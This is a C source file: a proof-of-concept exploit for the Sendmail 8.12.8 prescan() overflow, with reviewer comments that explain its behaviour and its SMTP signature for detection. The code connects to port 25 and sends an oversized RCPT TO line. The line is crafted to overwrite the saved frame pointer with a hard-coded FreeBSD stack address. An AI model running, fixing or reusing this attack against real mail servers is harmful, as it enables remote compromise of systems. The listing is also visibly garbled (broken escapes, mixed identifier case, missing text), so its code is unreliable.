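/*
 * Sendmail 8.12.8 prescan() proof-of-concept exploit by Bysin
 *
 * This is to prove that sendmail 8.12.8 and below is vulnerable to the prescan() bug.
 * On successful PoC exploitation the program should crash with the following:
 *
 * Program received signal SIGSEGV, Segmentation fault.
 * 0x5c5c5c5c in ?? ()
 *
 * (0x5c is the ASCII code for a backslash, so a fault at 0x5c5c5c5c means the
 * instruction pointer was overwritten with bytes taken from the request.)
 */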
#include
#include
#include
#include
#include
#include
#include
#include
#include
/* Number of entries in the target table; main rejects any target index >= this value. */
INT maxarch = 1;
/*
 * Per-target parameters.
 * NOTE(review): the closing brace of the struct and the terminating ';' of the
 * initializer are missing and a stray '/' follows the table -- this looks like
 * extraction damage; the code is left as found.
 * NOTE(review): the single entry hard-codes a stack offset and an absolute
 * address for one OS release, so the values are only meaningful for that build.
 */
Struct Arch {
Char * OS; // operating system label for this target
INT POS; // the position of EBP in the stack, with the last byte being 0x00
Int apos; // the number of bytes after pvpbuf where EBP is located
Unsigned long addr; // the pointer to the addr buffer
ARCHS [] = {
{"FreeBSD 4.7-Release", 180, 28, 0xbfbfdad1},
}
/
/* Buffer size in bytes; used for the receive buffers below (main spells it BUFSIZE -- presumably the same constant, confirm). */
#define buffsize 50096
/*
 * Prints the tool banner to stdout.
 * NOTE(review): the "/ N" sequences look like "\n" escapes damaged in
 * extraction; the string is left as found.
 */
void header () {
Printf ("Sendmail 8.12.8 PRESCAN () Exploit by Bysin / N / N");
}
/*
 * NOTE(review): the rest of this listing is damaged and does not compile as
 * shown. Escape sequences appear as "/ N", "/ t", "/ r"; identifier case is
 * inconsistent (the socket parameter is declared `suck` but used as SOCK;
 * buffsize vs BUFSIZE); several string literals are unterminated; and text is
 * visibly missing in places (the loop in PrintTargets, the usage message in
 * main, the second fill loop near the end). Nothing is reconstructed here;
 * the code is left as found.
 *
 * What the visible code does:
 *   PrintTargets  - prints the banner and the header of the target table.
 *   PrintResponse - echoes a string to stdout.
 *   Writesocket   - sends a string on the socket, exits on failure, then
 *                   echoes what was sent.
 *   ReadSocket    - receives one reply and exits unless atol() of the reply
 *                   equals the expected SMTP status code.
 *   relay         - keeps receiving replies; a failed recv() is reported as
 *                   "Server Vulnerable (CraShed)", a 553 reply as
 *                   "NOT ExploITable".
 *   main          - takes a host (argv[1]) and a target index (argv[2]),
 *                   connects to TCP port 25, waits for 220, sends HELO and
 *                   MAIL FROM (expecting 250 after each), then sends a single
 *                   oversized RCPT TO line and hands the socket to relay.
 *
 * What this looks like from the server side (useful for detection): an SMTP
 * session whose RCPT TO argument is far longer than any real address -- the
 * fill loop runs to 1242 -- made of filler characters with a ';' at every
 * 256th position, followed by a run of bytes shown here as '//' (presumably
 * backslashes, consistent with the 0x5c5c5c5c fault address in the file
 * header) interleaved with 0xff. A 553 reply means the server rejected the
 * address; a dropped connection is what the tool treats as a crash.
 *
 * Defects in the tool itself:
 *   - ReadSocket and relay pass sizeof(TEMP) to recv() and then give TEMP to
 *     atol() and printf("%s"); a reply that fills the buffer leaves it without
 *     a terminating NUL.
 *   - Every error path calls exit(0), so failures report success to the caller.
 */
Void PrintTargets () {
Unsigned long i;
HEADER ();
Printf ("/ t target / t addr / t / t os / N");
Printf ("/ t ------------------------------------------ / n ");
For (i = 0; i Printf ("/ n"); } Void PrintResponse (char * a) { Printf ("% s / n", a); } Void Writesocket (int suck, char * buf) { IF (SOND (SOCK, BUF, STRLEN (BUF), 0) <= 0 { Printf ("Error Writing to Socket / N); exit (0); } PrintResponse (BUF); } Void ReadSocket (int suck, int response) { CHAR TEMP [buffsize]; MEMSET (Temp, 0, Sizeof (TEMP)); IF (RECV (SOCK, TEMP, SIZEOF (TEMP), 0) <= 0) { Printf ("ERROR ROM Socket / N); exit (0); } IF (Response! = atol (TEMP)) { Printf ("Bad Response:% S / N", TEMP); exit (0); } Else PrintResponse (TEMP); } Void relay (int suck) { While (1) { CHAR TEMP [buffsize]; MEMSET (Temp, 0, Sizeof (TEMP)); IF (RECV (SOCK, TEMP, SIZEOF (TEMP), 0) <= 0) { Printf ("Server Vulnerable (CraShed) / N"); exit (0); } PRINTRESPONSE (TEMP); IF (atol (TEMP) == 553) { Printf ("NOT ExploITable / N"); exit (0); } } } INT main (int Argc, char ** argv) { Struct SockAddr_in Server; UNSIGNED Long ipaddr, i, j, m Int Sock, Target; CHAR TMP [BUFSIZE], BUF [BUFSIZE], * P, * POS = NULL IF (argc <= 2) { Printf ("% s PRINTTTARGETS (); Return 0; } Target = atol (argv [2]); IF (Target <0 || Target> = maxarch) { PRINTTTARGETS (); Return 0; } HEADER (); IF ((Sock = Socket (AF_INET, SOCK_STREAM, 0)) == -1) { Printf ("Unable To Create Socket / N); exit (0); } Server.sin_family = af_INet; Server.sin_port = HTONS (25); Printf ("Resolving Address ..."); Fflush (stdout); IF ((iPadDR = INET_ADDR (Argv [1])) == -1) { Struct Hostent * Hostm; IF ((Hostm = gethostByname) == null) { Printf ("Unable to Resolve Address / N); exit (0); } Memcpy ((char *) & server.sin_addr, hostm-> h_addr, hostm-> h_length); } Else Server.sin_addr.s_addr = ipaddr; MEMSET (& (Server.sin_zero), 0, 8); Printf ("Address Found / N"); Printf ("Connecting ..."); Fflush (stdout); IF (Connect (Sock, SockAddr *) & Server, SIZEOF (Server))! = 0) { Printf ("Unable to connection connect / n"); exit (0); } Printf ("Connected / N"); Printf ("Sending Exploit ... 
/ N"); fflush (stdout); Readsocket (Sock, 220); Writesocket (Sock, "Helo Yahoo.com/r/N"); Readsocket (Sock, 250); Writesocket (Sock, "Mail from: / r / n"); Readsocket (Sock, 250); MEMSET (BUF, 0, SIZEOF (BUF)); STRCPY (BUF, "RCPT TO:"); P = BUF Strlen (BUF); For (i = 1, j = 0, m = 0; i <1242; i ) { IF (! (i% 256)) { * p = ';'; J ; } Else { IF (j <4) * p = 'a'; Else { IF (m == Archs [target] .pos) POS = P; // if (m> archs [target] .pos) * p = 'b'; ELSE * p = 'a'; M ; } } } IF (POS) Memcpy (POS, (CHAR *) & Archs [target] .addr, 4); * p = ';'; For (i = 0; i * p = '//'; * p = 0xff; } STRCAT (BUF, "/ R / N"); Writesocket (SOCK, BUF); RELAY (SOCK); }